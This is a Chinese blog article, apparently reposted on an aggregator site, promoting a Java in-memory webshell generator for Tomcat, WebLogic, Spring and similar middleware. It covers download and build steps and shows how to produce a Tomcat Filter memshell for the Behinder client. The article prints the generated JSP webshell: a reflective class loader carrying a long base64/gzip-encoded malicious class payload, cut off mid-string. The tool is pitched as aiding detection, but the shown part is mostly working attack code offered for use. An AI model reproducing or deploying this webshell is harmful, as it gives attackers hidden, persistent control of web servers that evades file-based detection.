Java内存马生成神器|JavaMemshellGenerator

admin
admin
admin
0
文章
0
评论
2025-12-29 00:31:05 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了Java内存马生成工具JavaMemshellGenerator,支持Tomcat、Resin等中间件及Spring框架,可生成Filter、Listener等类型内存马,并提供JSP、Class等格式兼容冰蝎。文章演示了利用其图形化界面生成并连接TomcatFilter内存马的过程,旨在提升安全检测效率,仅限安全研究使用。 综合评分: 78 文章分类: WEB安全,红队,渗透测试,安全工具

cover_image

Java内存马生成神器 | Java Memshell Generator

原创

刘顺

安全有术

2025年12月28日 13:33 广东

0x00 前言

在安全领域,内存马是一种特殊的WebShell,它与传统WebShell不同,并非以文件形式存在于服务器磁盘,而是驻留在服务器内存中,这使得它更加隐蔽,难以被常规安全检测手段发现。而在Java Web应用环境下,针对主流Web中间件的内存马技术研究与应用一直备受关注。

之前的两篇文章我们通过手写Servlet和Filter内存马,初步了解了内存马的原理。【传送门】:手把手教你写一个Servlet内存马   学习如何写一个Filter内存马

今天,简单了解一款专注于Java主流Web中间件的内存马快速生成工具——Java Memshell Generator。

0x01 工具简介

Java Memshell Generator是一款功能强大且支持高度自定义的Java内存马生成工具。它涵盖了众多中间件、框架以及丰富的内存马类型,并提供多种输出格式,同时还具备辅助模块,极大地便利了安全研究人员和相关从业者在Java Web应用安全检测方面的工作。

项目地址:https://github.com/pen4uin/java-memshell-generator#

支持的中间件、框架、工具、内存马、输出格式等

| 中间件 | 框架 | 工具 (测试版本) | 内存马类型 | 输出格式 | 辅助模块 | | — | — | — | — | — | — | | Tomcat | SpringMVC | AntSword (2.1.15) | Listener | BASE64 | 专项漏洞封装 | | Resin | SpringWebFlux | Behinder (4.0.7) | Filter | BCEL | 表达式语句封装 | | WebLogic | | Godzilla (4.0.1) | Interceptor | BIGINTEGER | | | Jetty | | Neo-reGeorg (5.1.0) | HandlerMethod | CLASS | | | WebSphere | | Suo5 (0.9.0) | TomcatValve | JAR | | | Undertow | | Custom | | JAR_AGENT | | | GlassFish | | | | JS | | | Apusic(金蝶) | | | | JSP | | | BES(宝兰德) | | | | | | | InforSuite(中创) | | | | | | | TongWeb(东方通) | | | | | |

0x02 安装步骤

1、直接下载编译后的jar包

Java Memshell Generator工具是使用Maven构建的项目,需要编译后使用,如果你不想编译,可以直接通过下面链接下载编译后的Jar包。

https://github.com/pen4uin/java-memshell-generator/releases/tag/v1.0.9_250101

下载后在Jar包的目录下,可以通过java -jar jmg-all-1.0.9_250101.jar gui  打开工具的图形化页面。

2、编译后使用

如果你选择自行编译,建议使用Maven 3.9.3及以上版本在项目根目录下,执行以下命令进行编译。

mvn package assembly:single

执行上述命令后,Maven会自动下载项目所需的依赖库,并进行编译和打包,最终生成一个可执行的Jar文件,该文件包含了工具的所有依赖和代码,方便后续使用。

编译完成后,如果您喜欢使用图形化界面操作,可以通过以下命令启动工具的图形化界面。

java -jar ./releases/jmg - gui - 1.0.9.jar

0x02 工具使用

在界面中,您可以方便地进行各种配置。包括选择工具类型、中间件或框架、内存马类型、输出格式等等。接下来我们演示生成一个Tomcat的Filter内存马,并在Behinder(冰蝎)工具中使用。

1、如下图,工具选择Behinder、中间件选择Tomcat、组件类型选择Filter、输出格式选择Jsp

2、点击生成后,工具就为我们生成了一个jsp的木马文件,文件内容如下

<%&nbsp; &nbsp;&nbsp;ClassLoader&nbsp;classLoader&nbsp;=&nbsp;Thread.currentThread().getContextClassLoader();&nbsp; &nbsp;&nbsp;try{&nbsp; &nbsp; &nbsp; &nbsp; classLoader.loadClass("org.apache.commons.d.ReflectUtil").newInstance();&nbsp; &nbsp; }catch&nbsp;(Exception e){&nbsp; &nbsp; &nbsp; &nbsp; java.lang.reflect.Method&nbsp;defineClass&nbsp;=&nbsp;ClassLoader.class.getDeclaredMethod("defineClass",&nbsp;byte[].class,&nbsp;int.class,&nbsp;int.class);&nbsp; &nbsp; &nbsp; &nbsp; defineClass.setAccessible(true);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;String&nbsp;bytecodeBase64&nbsp;=&nbsp;"yv66vgAAADEBewEAIG9yZy9hcGFjaGUvY29tbW9ucy9kL1JlZmxlY3RVdGlsBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADGdldENsYXNzTmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAHm9yZy5hcGFjaGUuU2Vzc2lvbkhpdm9MaXN0ZW5lcggACAEAD2dldEJhc2U2NFN0cmluZwEACkV4Y2VwdGlvbnMBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwAMAQAQamF2YS9sYW5nL1N0cmluZwcADgELzEg0c0lBQUFBQUFBQS80MVhlVnhVMXhYK0xqUHdobUUwY1ZBVWJaTzR3ekF3aWhnVnNpZ0NBUVUwVElwQll0ckhtd2M4SFdiR2VXK0kyTWEwcVUyYk5FMzNwdW0rSktWdGJLdHRIRlNxTVhaSm0rNUx1dTk3MC9iLy9wT20zMzN2TWNBd2lEK0d0OXg3em5mTy9jNXk3M3ZoZnhjdUFkaU0vd2pja0V3UFJkU1VxZzNya2FodW1rWXkwVzZNSmpzTjA5SVRlbHFCRUZoMldCMVZJM0UxTVJUWkhWZE5zek9weHVTVVIyQ2RuRG9XTWZYMGFGeTNpR0RmZS9TakdkMjBwa0dLQlVwdU1SS0dkWnVBcDZxNlY4QzdPeG5UQmE3ck5CSjZkMlprUUUvZnBRN0VPUkxzVEdwcXZGZE5HL0xkSGZSYXc0WXBjRlBuMWIxdENrQ0J6dzh2Rmd1c3JPb3M2SGVUTkM4MGdlWHp6RXVRNnlWSU9lV0d1UHlxL3VicWZOa216ZzBJRlBVM0M1VEY5RUV1d3g0bkxNVTdPdVlxQkZDSmxSSjJsY0QxYVllaEZ2Nm5rMk42VEdDRDQrNThYTGFPNmduTGRyM2NuRHNoc1BZYXRFbXVhN2VEb1REVXVIRmNXaTZmOXJUMW1LYW5MTEtxWUEwWDdtSnE2YkdVbFl6c05sTERwRWZBbDliTlZESmhNakQ1VGc5YlZpclN6a3ZPdmlOSkxjVjBBaWJET0srU0xVRmhUM0xnc013TzI3V01aY1FqWFdwS2dyZ0xFTmk0b0dWYmtEcXJGMlJHUWEzQSttdkNVeEJocks1dDBRbzJzOEN1dmxZRld3UVd6VnFtZ3EwY2lscXFkb1J2YmdVc0dkS3QyWjZReDZycXEwYWRLYmNkTy95b1E2T0FmMWlYMmQydGp0aEZOaDN6cUpVMkVrT1V2UVczbHFJSUxORlNHbXUzeFhONU9VdTJ1cEQ2VHV3cXd5YkllbkJNOWFyeGpCNUFpd1BieXF6UDExSndCN05KU3lZczFVaXdkRmJOS3RsaE5SMlZDMGxvZWxQMXdRQTZzTWVQZHV3VnFCaWFKcmt0blJ6Sk1YTG53dm5vTUpOUDNMeDVHMEFYdXYzMGZ4OHB0R1BnSnZHYU9lVFBTZU1BN2tTUDVDVEsrRTJIdUYwMWgrMHd2OGFQWGl6Mm9ZYjVuc3JRL2UwejE3OXY0TEN1V1UxelI2cm5EZ1hRaDRObHVCbjlQcXozWVNPYlU4YUgxN0p4cHRoNkFsQ2RHTEJoK1dqSURnd3JxRUJrQzFqckRTQUd2UXdOR0tTZnUxcWpQZ3k3VFNPdk5TaGd6WmFScEk2RWFha01tMEQxdk5tVDMxWUNpR1BFanlNZ3R6Zk9FakJUdXNiTTF0SzZ0VmNmaS9KTlFZb3JvYUhtTVV0bjNuaXJxdnViQTBqRGxBbGlPVDI0Z09GZTJkcEgvVGlLKzZnazl5TXAydUZJbXJxV1NSdldXSVJHYk5FeEhKZit2SDVXNGpxc0tMamZjY0R0K2VWVmhmcjlBM2lqSHlmd0pqYXl2RWtGYnhaWVBLWHY3RHNDbFhOUmNsdlNXL0NRSHlmeFZwbUs1VTZGOXJnVnVuSkt6VWhHbWpPRGczcGFqemx6MUhzRWI1Y1orQ2lMcHJDTWdzZnNqcTdHNUZZc3NMU3FZSFcvQysvMjQ1MTRqMEJnUURYMW14dGFkTTNld1NzS1JWaEc0MzE0djNUMkEyemFzV1Nia1ZEalBBVElyVlJPZmhCUFNHNC9GTUF5VkVpeGp6QnpFdnA5MDVrejI0OWNubjhNSDVjOGZJSllMR1UxYnNyOXVVRFdzbDk4Q3ArVzlEL0p3czN0YXhRdkpuVnR2UXNXVzRGV2wzTmlISitWUG4vTzdlN09iSGN5bXRHRzJ3dzlIcHV4alQ3TlJCdFYwMXVuZHIzNVpac2N5VTJ6dTdOcjA1bmI3TnpxbVNvelJOTDZZSnd5RVJ2T2xlU21zcVRBa1dYNVBGb0tzc3h5RXNPb3hsWG1oajBxVUx0QTg1OXRPb0J6T0MramM0SDdsK3lWbVpTZTF1SjJCL3FxcklXVHVKZ1hybG1WK2F3ZnAzQ1p1cVp1N2RJMDJVV2QwMS9WUVNsd0JWL3pZd0pmWnhjaWVON09kTFhlK0UwOEx4Vy94ZGpUbStQSFpVYmEyWnVlT3VQa25YN2tBWVFITXlhM21VblVqUmltVnRlOEs5bzZsZlJwSDc1UGpNR2t1NXV1WDRDbHFYN3dRL3hJY3ZCajFwQmozNmxFSDM3cUZIU1hiZzBueWZyT0FuajljL0FLeGNGQm9LbWY0ZWZTMUM4RVZzd25wZUJYTENJak1abzh3alhzS0VCbS96WHkreHY4MW85ZjQzY0tWcmk5c2s1dWRIWE5kcVB3NFkvTzFwa2o3OCswNnhEZ3cxK3BVYjlOMnpLNFpYQmd5K1pZUTBQOWpwZ1BmeWU5UGJyc1VoVC9Kek5nejRocCtmQXZyR2JaZVVGOWVIamx0c2J2R0NGUEx2YTl4Yjc3K0tUWTExSyt0VkpEOEw0OE5JSHJRc0YvbklVV0NyNTBGcmVIZ3Y4K2k3WXpuQ3FDbjFkWjBVQUYvNWFqakU4QlI0MzNSVFk0UHdwY3lQMlVsTElyUWpVVFdMb3c1a3FpckxJeEt4dzlGMU0rTFVHUXFFSzJRUmY5Vmk1UVNwV0dhancxbHlid3F0TTV1QkxicFJ0blFKWG1vRXBwWklVTjlXcmM0RUp0dFRYcC9KazhpSFV6SUVRT2doc3ZickloVms5QmlDZXBvWER1U2swV1RaZXhxU3NjZWdhM244ZnVJcGJWMDlNdmZHakxvdk1KUEI0S1QyQi9kL2c4N2hKbzlFNml0MjhDQnhxTEs0dURkM1B3SGc4TzhQRlFiZTd4M2txdisrd052bzR3Mm5rTWVSQTB6aUhaV0ZKWlVqeUpvMzF5T0l0TTBKakFzU3plTUltaXZsQVdEMmJ4dGdrOFhGa1NJdkE3QkxKNGJ4YVBaL0hoTEQ2YXhTY3JpN040NnNBNGlodEx4dUh0UGlNUFFPeFFrMWpMNUxpSXk3eDdiRTdhR0FWZ0kwZXIrUmRDQkRYWWhqQlB0TFhZeTlOekwwY0crTG1jUkQxR3NRV1A4aXgwam9ldFNSSjhFWTFFMm83bm1JU1MwM1o1d2tBekVkZVJ1UWdldzNwc29KMXRlSWdXcWhqYm5iamZ0bElzV2MxeGY4WGwzb2NMdEI2bXI5czR1Z0hlVjJpbVJFR1Jnam9GbXhUVUsyaFFhRndvV1B0ZmlHYmVaR3g1U3VYMU05U1I1YkhXRG44N1I2U1ZzT2lxQ2Q1OURwOFBIdUxsTXVxN3hsSFpYVFBqemRmb0hZZUh2L0JwTzdlWFlDa3hsdEduTlJLZTNuTEw0N2hFZlpHcmthamJSWmVNUVhkdDhNUlRxS2hsZmt3U2FWR2p0emFMUzkzanI3d1VmaDZCU1p6cVk1RTg5MnpZbThVM3dsVDQ5bW42dHdqbHpMNVRMdi8xWkFIWVRmd1dzdGZHMlhiT2QxQmlEMU42THhPNms5enNJNlA3R1pFZXlrZHRyaHZveHdyK2Z3RmY1S3JwRWI2RTB6YWIyM0dHZGNUUGN4TDFaWHlGZDM2TDRSbWN0U01CcnMvN01oUUZFd3BPZGlzNFZScVlRWjJRUnhkM3NTOHppSEt4WThFZm5NTlB1c0xCRjcwWGNiTFBFMnlQWnZITE1MT003eWY2UERWOC9mMWwvQ0gzTzkwVi9CTTF5TTVmUE5TZ3NPRDlCS1VhdlpYazRzSGczMllpVlhybnc3SHJkUk85bjhyV2xYUUpQTytYNENCSCs4bkdQVnp2SVhKMHI4M0tiWndwWVE2OXdOVVdjV2FYL2VUaGZDMitRMzY4MUxpRG5IM1hydjZ4WEFhTzRYczJaOXVjTG5GVUp0WTBLZmcvNG5YS2x6VVNBQUE9CAAQAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAASABMKAA8AFAEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABcBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAhsaXN0ZW5lcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAB2NvbnRleHQBAAhjb250ZXh0cwEAEExqYXZhL3V0aWwvTGlzdDsBAAR0aGlzAQAiTG9yZy9hcGFjaGUvY29tbW9ucy9kL1JlZmxlY3RVdGlsOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAA5qYXZhL3V0aWwvTGlzdAcAJAEAEmphdmEvdXRpbC9JdGVyYXRvcgcAJgEADVN0YWNrTWFwVGFibGUMABIAFgoABAApAQAKZ2V0Q29udGV4dAEAEigpTGphdmEvdXRpbC9MaXN0OwwAKwAsCgACAC0BAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMAC8AMAsAJQAxAQAHaGFzTmV4dAEAAygpWgwAMwA0CwAnADUBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMADcAOAsAJwA5AQALZ2V0TGlzdGVuZXIBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAOwA8CgACAD0BAAthZGRMaXN0ZW5lcgEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspVgwAPwBACgACAEEBAARrZXkxAQAIY2hpbGRyZW4BABNMamF2YS91dGlsL0hhc2hNYXA7AQADa2V5AQALY2hpbGRyZW5NYXABAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAE0BABBqYXZhL2xhbmcvVGhyZWFkBwBPAQARamF2YS91dGlsL0hhc2hNYXAHAFEBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwBTCgBUACkBAApnZXRUaHJlYWRzCABWAQAMaW52b2tlTWV0aG9kAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAFgAWQoAAgBaAQAHZ2V0TmFtZQwAXAAGCgBQAF0BABxDb250YWluZXJCYWNrZ3JvdW5kUHJvY2Vzc29yCABfAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAGEAYgoADwBjAQAGdGFyZ2V0CABlAQAFZ2V0RlYMAGcAWQoAAgBoAQAGdGhpcyQwCABqCABEAQAGa2V5U2V0AQARKClMamF2YS91dGlsL1NldDsMAG0AbgoAUgBvAQANamF2YS91dGlsL1NldAcAcQsAcgAxAQADZ2V0DAB0ADwKAFIAdQEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAdwB4CgAEAHkBAA9qYXZhL2xhbmcvQ2xhc3MHAHsKAHwAXQEAD1N0YW5kYXJkQ29udGV4dAgAfgEAA2FkZAEAFShMamF2YS9sYW5nL09iamVjdDspWgwAgACBCwAlAIIBABVUb21jYXRFbWJlZGRlZENvbnRleHQIAIQBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DACGAIcKAFAAiAEACHRvU3RyaW5nDACKAAYKAHwAiwEAGVBhcmFsbGVsV2ViYXBwQ2xhc3NMb2FkZXIIAI0BAB9Ub21jYXRFbWJlZGRlZFdlYmFwcENsYXNzTG9hZGVyCACPAQAJcmVzb3VyY2VzCACRCAAdAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAJQBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYMABIAlgoAlQCXAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24HAJkBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwCbAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAnQEACVNpZ25hdHVyZQEAJigpTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQATamF2YS9sYW5nL1Rocm93YWJsZQcAoQEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAtjbGFzc0xvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwCrAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DACtAK4KAFAArwEADmdldENsYXNzTG9hZGVyDACxAIcKAHwAsgwABQAGCgACALQBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAC2ALcKAKwAuAEAC25ld0luc3RhbmNlDAC6ADgKAHwAuwwACgAGCgACAL0BAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDAC/AMAKAAIAwQEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDADDAMQKAAIAxQgApQcApAEAEWphdmEvbGFuZy9JbnRlZ2VyBwDJAQAEVFlQRQwAywCoCQDKAMwBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAM4AzwoAfADQAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwDSAQANc2V0QWNjZXNzaWJsZQEABChaKVYMANQA1QoA0wDWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMANgA2QoAygDaAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DADcAN0KANMA3gEAB29iamVjdHMBABNbTGphdmEvbGFuZy9PYmplY3Q7AQAJbGlzdGVuZXJzAQAJYXJyYXlMaXN0AQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAKaXNJbmplY3RlZAEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspWgwA5QDmCgACAOcBABthZGRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXIIAOkBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAFgA6woAAgDsAQAcZ2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwgA7gcA4QEAEGphdmEvdXRpbC9BcnJheXMHAPEBAAZhc0xpc3QBACUoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS91dGlsL0xpc3Q7DADzAPQKAPIA9QEAGShMamF2YS91dGlsL0NvbGxlY3Rpb247KVYMABIA9woAVAD4CgBUAIIBABxzZXRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJzCAD7AQAHdG9BcnJheQEAFSgpW0xqYXZhL2xhbmcvT2JqZWN0OwwA/QD+CgBUAP8BAAFpAQABSQEADWV2aWxDbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAARzaXplAQADKClJDAEFAQYKAFQBBwEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwwAdAEJCgBUAQoBAAxkZWNvZGVyQ2xhc3MBAAdkZWNvZGVyAQAHaWdub3JlZAEACWJhc2U2NFN0cgEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47AQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcggBEQEAB2Zvck5hbWUMARMAtwoAfAEUAQAMZGVjb2RlQnVmZmVyCAEWAQAJZ2V0TWV0aG9kDAEYAM8KAHwBGQEAEGphdmEudXRpbC5CYXNlNjQIARsBAApnZXREZWNvZGVyCAEdAQAGZGVjb2RlCAEfAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HASEBAA5jb21wcmVzc2VkRGF0YQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAJpbgEAHkxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtOwEABnVuZ3ppcAEAH0xqYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbTsBAAZidWZmZXIBAAFuAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HASwBABxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtBwEuAQAdamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW0HATAKAS0AKQEABShbQilWDAASATMKAS8BNAEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAEgE2CgExATcBAARyZWFkAQAFKFtCKUkMATkBOgoBMQE7AQAFd3JpdGUBAAcoW0JJSSlWDAE9AT4KAS0BPwEAC3RvQnl0ZUFycmF5AQAEKClbQgwBQQFCCgEtAUMBAANvYmoBAAlmaWVsZE5hbWUBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAARnZXRGAQA/KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxl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